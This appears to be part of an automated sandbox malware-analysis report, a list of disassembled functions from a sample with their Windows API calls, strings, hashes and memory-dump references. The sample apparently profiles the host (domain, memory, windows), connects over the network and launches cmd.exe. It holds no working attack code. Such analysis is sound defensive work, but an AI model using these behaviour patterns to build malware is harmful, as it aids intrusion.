                                          • DsRoleGetPrimaryDomainInformation.NETAPI32(00000000,00000001,?,?,00000000,?,?,?), ref: 009C39E0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ComputerDomainInformationNamePrimaryRole
                                          • String ID: Empty$_D:$w#G!
                                          • API String ID: 1590873629-1893610252
                                          • Opcode ID: 0f7ad70c166cd478548cbb53c172f7bf4b1354662196945eb2e1a7bb2f167df3
                                          • Instruction ID: 1f660dac41564bf12507b1383fd58fdbc9aa63670d591a81506c86c141845504
                                          • Opcode Fuzzy Hash: 0f7ad70c166cd478548cbb53c172f7bf4b1354662196945eb2e1a7bb2f167df3
                                          • Instruction Fuzzy Hash: 2FF19D719102598BEB28DB24CD85BAEB7B6BB84300F14C6DCD089A7291DF759BC4CF91
                                          Function 00A3CA40 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 158COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(21472377,?,00000000,?), ref: 00A3CA77
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A3CB5B
                                          • GetFileAttributesW.KERNEL32(?,21472377,?,?,?,?,?,?,?,00A8FCD0,000000FF,?,009B4A32), ref: 00A3CBB2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: AttributesErrorException@8FileLastThrow
                                          • String ID: boost::filesystem::status$w#G!
                                          • API String ID: 1873943377-55005676
                                          • Opcode ID: fef1d7d7defea995ffd9353b4bbadb978cb0158058aafcb2d081f5a35371f9c6
                                          • Instruction ID: a9c345b6c016aa77496e9b6e902718c094f4ec51f4f9a4f209a37af2a01ed355
                                          • Opcode Fuzzy Hash: fef1d7d7defea995ffd9353b4bbadb978cb0158058aafcb2d081f5a35371f9c6
                                          • Instruction Fuzzy Hash: 1D417372E00219ABCB10DFA8DC85BAEF7B9FB49764F14462AF815A7240D774AD04CB91
                                          Function 00A3CB70 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 139fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNEL32(?,21472377,?,?,?,?,?,?,?,00A8FCD0,000000FF,?,009B4A32), ref: 00A3CBB2
                                          • CreateFileW.KERNEL32(?,00000000,00000007,00000000,00000003,02000000,00000000,?,?,?,?,?,?,?,?,00A8FCD0), ref: 00A3CC4D
                                            • Part of subcall function 00A3C860: CreateFileW.KERNEL32(00A3CC7E,00000008,00000007,00000000,00000003,02200000,00000000,21472377,?,00000000,?,00A3CC7E,?), ref: 00A3C8A3
                                            • Part of subcall function 00A3C860: CloseHandle.KERNEL32(00000000), ref: 00A3C924
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00A8FCD0), ref: 00A3CC99
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00A8FCD0), ref: 00A3CCA9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: CloseFileHandle$Create$Attributes
                                          • String ID: w#G!
                                          • API String ID: 2696689969-519468572
                                          • Opcode ID: e949132df1238f2669eafcc97ccc55558c19380786330060203133be7f1d2f1a
                                          • Instruction ID: a31ccb3b869ff3606235edec0bc006620c0858fa85f8eac2bf9f9362b5c14ca4
                                          • Opcode Fuzzy Hash: e949132df1238f2669eafcc97ccc55558c19380786330060203133be7f1d2f1a
                                          • Instruction Fuzzy Hash: 95515E75E00218AFDB04DFA8DD45BAEBBB4EB48724F144129F919B7381D7709904CBA1
                                          Function 00A76EB7 Relevance: 7.7, APIs: 5, Instructions: 198pipeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreatePipe.KERNEL32(?,?,0000000C,?,?,?,?,?,?,?,?,00ACCF60,00000028,00A6478F,?,00000400), ref: 00A76F65
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00ACCF60,00000028,00A6478F,?,00000400,00000080,00ACCB60,00000028), ref: 00A76F6F
                                          • __dosmaperr.LIBCMT ref: 00A76F76
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00ACCF60,00000028,00A6478F,?,00000400,00000080,00ACCB60,00000028), ref: 00A76FA1
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00ACCF60,00000028,00A6478F,?,00000400,00000080,00ACCB60,00000028), ref: 00A76FAA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: CloseHandle$CreateErrorLastPipe__dosmaperr
                                          • String ID:
                                          • API String ID: 155357802-0
                                          • Opcode ID: ead411fe247ab6a34aac30e115b8a7e87c4e4ac1d84b2b7e5792f4773d667752
                                          • Instruction ID: 18022510c9fc468d6b0cfd6339acce0413e2d3375e69897e19ec25bd3ebf7530
                                          • Opcode Fuzzy Hash: ead411fe247ab6a34aac30e115b8a7e87c4e4ac1d84b2b7e5792f4773d667752
                                          • Instruction Fuzzy Hash: 5671F472A116028BDB10EFB8DD45A9E77B5AF45324F18C21AF059CF2A2DB35D802CB50
                                          Function 00A76C52 Relevance: 7.6, APIs: 5, Instructions: 64synchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WaitForSingleObject.KERNEL32(00000010,00000000,00000000,00000000,00000000,?,?,00A64D8C,00000000,00000000,00000001,?,00ACCB40,00000010,009B88E3,00000000), ref: 00A76C75
                                          • GetExitCodeProcess.KERNEL32(00000010,00000000), ref: 00A76C84
                                          • GetLastError.KERNEL32(?,?,00A64D8C,00000000,00000000,00000001,?,00ACCB40,00000010,009B88E3,00000000), ref: 00A76C9B
                                          • __dosmaperr.LIBCMT ref: 00A76CBF
                                          • CloseHandle.KERNEL32(00000010,?,?,00A64D8C,00000000,00000000,00000001,?,00ACCB40,00000010,009B88E3,00000000), ref: 00A76CD2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait__dosmaperr
                                          • String ID:
                                          • API String ID: 2013101682-0
                                          • Opcode ID: 654a6ceba539fa65a8c3f5b465c5144003ccee1e47e04421b17677a0a79d4e4b
                                          • Instruction ID: 977e43dd1828a20b75dd5b0c762779cf7566fc7d876a540bf10da895cadf2049
                                          • Opcode Fuzzy Hash: 654a6ceba539fa65a8c3f5b465c5144003ccee1e47e04421b17677a0a79d4e4b
                                          • Instruction Fuzzy Hash: 1811C673600E10ABDB126FA98D8476AB778EF85320F25C215F89D87250DB319D018BA1
                                          Function 00A75628 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: w#G!
                                          • API String ID: 0-519468572
                                          • Opcode ID: 3f0949354296d1e42cb10deb7007c89e5765544181acba63c65440506d861675
                                          • Instruction ID: 9188549b1b489282323015165715824bd07d8219559114b8c8b6a9b1d2ff6c53
                                          • Opcode Fuzzy Hash: 3f0949354296d1e42cb10deb7007c89e5765544181acba63c65440506d861675
                                          • Instruction Fuzzy Hash: BF51CE72E00A0ADBDB14DFB4CD45FAF7BB8EF05320F54C519E418A7292D6B09901DBA1
                                          Function 00A65182 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 101COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: _free
                                          • String ID: COMSPEC$cmd.exe$w#G!
                                          • API String ID: 269201875-4135058600
                                          • Opcode ID: 314ebfbe196aa91eff68533e9863cb93202605cb322ec4add30f0a3b6f4fc30c
                                          • Instruction ID: 4f68ce3261bbafe4f51c62e6c91287a2a5d92ce28a4e1920a6378db32133c0d7
                                          • Opcode Fuzzy Hash: 314ebfbe196aa91eff68533e9863cb93202605cb322ec4add30f0a3b6f4fc30c
                                          • Instruction Fuzzy Hash: 5E31A9B1D015159B9B21EFB4CE419AFBBB8EF42361F150266F915A7251D6304E01CBE1
                                          Function 009C6330 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 172networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetConnectW.WININET(?,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 009C63F4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ConnectInternet
                                          • String ID: 0.0.0.1$`
                                          • API String ID: 3050416762-3652615328
                                          • Opcode ID: ea6a6c8d9341d0c5bb6ef5de287157b6cf51df9d1219499102950eac465790cd
                                          • Instruction ID: 2965bfac7bc66546f44bf2c6197aa7960a0adb6a5c71f7540d5b872a4de8d78c
                                          • Opcode Fuzzy Hash: ea6a6c8d9341d0c5bb6ef5de287157b6cf51df9d1219499102950eac465790cd
                                          • Instruction Fuzzy Hash: E851C070A101699BDF18DF24CD85F9DB7B6AF84304F90819DF509A7292C738AA84CF59
                                          Function 00A75243 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • WriteFile.KERNEL32(7408458B,?,?,?,00000000,?,00A6AB2E,E0830C40,?,00A7577F,00A28F76,00A6AB2E,?,00A6AB2E,00A6AB2E,00A28F76), ref: 00A752DE
                                          • GetLastError.KERNEL32(?,00A7577F,00A28F76,00A6AB2E,?,00A6AB2E,00A6AB2E,00A28F76,00A6AB2E,?,00ACCEE0,00000014,00A61B64,00000000,8304488B,00A28F76), ref: 00A75307
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastWrite
                                          • String ID: w#G!
                                          • API String ID: 442123175-519468572
                                          • Opcode ID: b0c8a5a5eb1092f6e336109c75dce6b1814db48f26df945c9494d1448ac86fb2
                                          • Instruction ID: 5112172178741113c5319a6c7e5310632ea2b224ce357bcbad6d3de0a65c9f64
                                          • Opcode Fuzzy Hash: b0c8a5a5eb1092f6e336109c75dce6b1814db48f26df945c9494d1448ac86fb2
                                          • Instruction Fuzzy Hash: DB21A835A007199FCB14CF69CD80AE9B3F5EB48341F1084AAE54AD7251D770AD86CF50
                                          Function 009C4420 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalMemoryStatusEx.KERNEL32(?,00000000), ref: 009C444D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: GlobalMemoryStatus
                                          • String ID: @$w#G!
                                          • API String ID: 1890195054-3043592971
                                          • Opcode ID: d429d5e6812142c498938d6e7d4b4fa984530b853f9e79be1cb7a82da9cd337c
                                          • Instruction ID: 94a101a35e44cc7f3b61a1630a6989032234d1e32447769736d7ee204204ac08
                                          • Opcode Fuzzy Hash: d429d5e6812142c498938d6e7d4b4fa984530b853f9e79be1cb7a82da9cd337c
                                          • Instruction Fuzzy Hash: 7121F071A14B449BC260EF38DD42B1BB7F5AF9AB40F000B1EF48597241EB70A8548BC2
                                          Function 009C45EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                          Download Yara Rule
                                          APIs
                                          • NetApiBufferFree.NETAPI32(00000000), ref: 009C4606
                                          • NetApiBufferFree.NETAPI32(00000000), ref: 009C4622
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: BufferFree
                                          • String ID: Default
                                          • API String ID: 710964542-753088835
                                          • Opcode ID: 33a0a89e32f339c36d84a8b93b88dbd3d83b1a396c349fe96d8777ea6f90bb1f
                                          • Instruction ID: 3885e42d10b027170be974ddf0f73574cde7dbdb53e65fbf261787a3df6846d8
                                          • Opcode Fuzzy Hash: 33a0a89e32f339c36d84a8b93b88dbd3d83b1a396c349fe96d8777ea6f90bb1f
                                          • Instruction Fuzzy Hash: B8F04F35F052099BDB28DF98D5A1BADB7B5EB49321F10426FD81663680CB35A9008A91
                                          Function 00A7595D Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • CloseHandle.KERNEL32(00000000,00000000,00A28F4C,?,00A7587B,00A28F4C,00ACCF00,0000000C), ref: 00A759B3
                                          • GetLastError.KERNEL32(?,00A7587B,00A28F4C,00ACCF00,0000000C), ref: 00A759BD
                                          • __dosmaperr.LIBCMT ref: 00A759E8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: CloseErrorHandleLast__dosmaperr
                                          • String ID:
                                          • API String ID: 2583163307-0
                                          • Opcode ID: d5a40f54f5681c4978403519145939db09390aede1be560ba3574a22a6aa6162
                                          • Instruction ID: aaeb9b4abed493412da24f0be0579aa14963872d391aa0f5dd989c9e290821fd
                                          • Opcode Fuzzy Hash: d5a40f54f5681c4978403519145939db09390aede1be560ba3574a22a6aa6162
                                          • Instruction Fuzzy Hash: D4016D33E049109AD62453B4AD8577F67598B82734F29CA1EFA1C8B1D2EEA0CD82C154
                                          Function 00A78F5D Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • SetFilePointerEx.KERNEL32(00000000,00000000,00A28F76,00000000,00000002,00A28F76,00000000,?,?,?,00A7900C,00000000,00000000,00A28F76,00000002), ref: 00A78F96
                                          • GetLastError.KERNEL32(?,00A7900C,00000000,00000000,00A28F76,00000002,?,00A6AA52,?,00000000,00000000,00000001,?,00A28F76,?,00A6AB07), ref: 00A78FA0
                                          • __dosmaperr.LIBCMT ref: 00A78FA7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastPointer__dosmaperr
                                          • String ID:
                                          • API String ID: 2336955059-0
                                          • Opcode ID: fe4017000c3731cfbdf30551f173f46cafb8c7ed8e153f05d8e58606efd4397c
                                          • Instruction ID: 61be3a9d71711fff35a3f50cf5b766f9da9c7a54db8afcdb14a54564b1c182b7
                                          • Opcode Fuzzy Hash: fe4017000c3731cfbdf30551f173f46cafb8c7ed8e153f05d8e58606efd4397c
                                          • Instruction Fuzzy Hash: 4C01D833714515ABCB059FE9DC098AE7B3AEB85330B288249F8199B290EE759D51CB90
                                          Function 009C5D90 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66COMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalMemoryStatusEx.KERNEL32(21472377), ref: 009C5DAF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: GlobalMemoryStatus
                                          • String ID: w#G!
                                          • API String ID: 1890195054-519468572
                                          • Opcode ID: 8392eceb389ee1d3da4bfb515d7bc2798a0d748dcdf01a4e23fdaec752bdf67f
                                          • Instruction ID: 5732d444d62197521598a9067cda8d2f707c0ac584ba79158a22d6fe6cccda76
                                          • Opcode Fuzzy Hash: 8392eceb389ee1d3da4bfb515d7bc2798a0d748dcdf01a4e23fdaec752bdf67f
                                          • Instruction Fuzzy Hash: 3F119430704B0447EB14EB24D952B3EB3E8DB85711F41056DEE8F87781EE6AED509683
                                          Function 009C58E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18COMMON
                                          Download Yara Rule
                                          APIs
                                          • EnumWindows.USER32(009C52E0,?), ref: 009C5900
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: EnumWindows
                                          • String ID: w#G!
                                          • API String ID: 1129996299-519468572
                                          • Opcode ID: 27e57a10f71083ea13a5fe70e4039ac7567bfc435f6f006b37e639598c23416b
                                          • Instruction ID: b5407301f473a8fe8bc6c7b1292b4e36d81c6bd0e340163efe5759e990013d90
                                          • Opcode Fuzzy Hash: 27e57a10f71083ea13a5fe70e4039ac7567bfc435f6f006b37e639598c23416b
                                          • Instruction Fuzzy Hash: FFE01235A0030CABCB00DFA5DD45B9EBBF8DB44301F5141A9D90697240DE706A058B95
                                          Function 00A28F8D Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
